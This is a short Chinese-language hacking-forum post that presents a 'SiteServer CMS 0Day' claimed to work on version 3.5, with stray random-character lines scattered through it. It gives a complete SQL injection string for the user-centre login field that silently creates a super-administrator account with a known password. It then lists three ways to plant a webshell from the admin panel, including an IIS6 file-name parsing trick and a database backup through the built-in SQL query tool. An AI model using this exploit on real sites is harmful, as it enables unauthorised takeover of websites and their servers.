SiteServer CMS 0Day

admin

经测试秒杀最新的3.5版
. D' Y. F8 f$ _5 n# B4 d' f
stieserver官网:www.siteserver.cn

3 v$ y3 }/ @9 ?
; W+ y  W1 j$ N  `
4 Z: D* o" }8 O! n& ~$ GEXP:

直接访问UserCenter/login.aspx

! f4 B" H# `+ o" c  s

用户名处输入：
; u( b4 U# E, {
123'insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values('blue','VffSUZcBPo4=','Encrypted','i7jq4LwC25wKDoqHErBWaw==');insert into bairong_AdministratorsInRoles values('Administrator','blue');insert into bairong_AdministratorsInRoles values('RegisteredUser','blue');insert into bairong_AdministratorsInRoles values('ConsoleAdministrator','blue');--
: x* f% h" y; p8 {0 t/ }
  P' E, S: ^  u7 S

密码为空，输入验证码后提交，既可向数据库中插入一个用户名为blue  密码为lanhai的超级用户。
$ q/ `+ m1 a5 d* Z# ]
% y1 ?( w6 i% a
# l% w' s: b& G
: h5 w9 ]' |% t( M之后再访问后台SiteServer/login.aspx用插入的用户登陆
7 Q/ k1 @5 _  J# a


" W% E1 h* c9 i* z. ]后台拿webshell的三种方法：

% b9 B5 v. l! e# }一、

6 u; T( S- \/ ?1 N, W站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx

  D6 N7 B4 n! ], g7 j! p二、
1 ?1 V8 p. H8 b  D/ r7 S  D! W9 X
成员权限-》添加用户-》用户名为：1.asp
0 x* r" J  T0 H' V, Y) H. m
http://127.0.0.1/usercenter/
/ z% u& O5 t. n6 p
" l3 X, u( @5 b% z% L用刚才添加的1.asp去登陆，进去之后上传个人头像，利用IIS6解析漏洞得webshell
$ V0 O( D2 e4 h7 T; N! o
: N* }7 e8 j1 H8 y3 T: O（ps：后台添加用户时不会验证是否含有非法字符）
9 V) V% K9 c2 ^: p5 F
+ j' X& S; j2 c0 ]! [2 G! f三、
' v; U* E2 O; I* N
系统工具-》实用工具-》机器参数查看
可以看到数据库类型、名称，WEB路径
  d# D9 @9 q1 R) R2 U$ o5 t% t
系统工具-》数据库工具-》SQL语句查询
9 T' s5 p7 h$ n6 e1 V- g* D8 [这功能做的不错，直接就相当于一个查询分析器，什么回显都有，可以backup得webshell，或者利用sqlserver配置不当直接XXOO。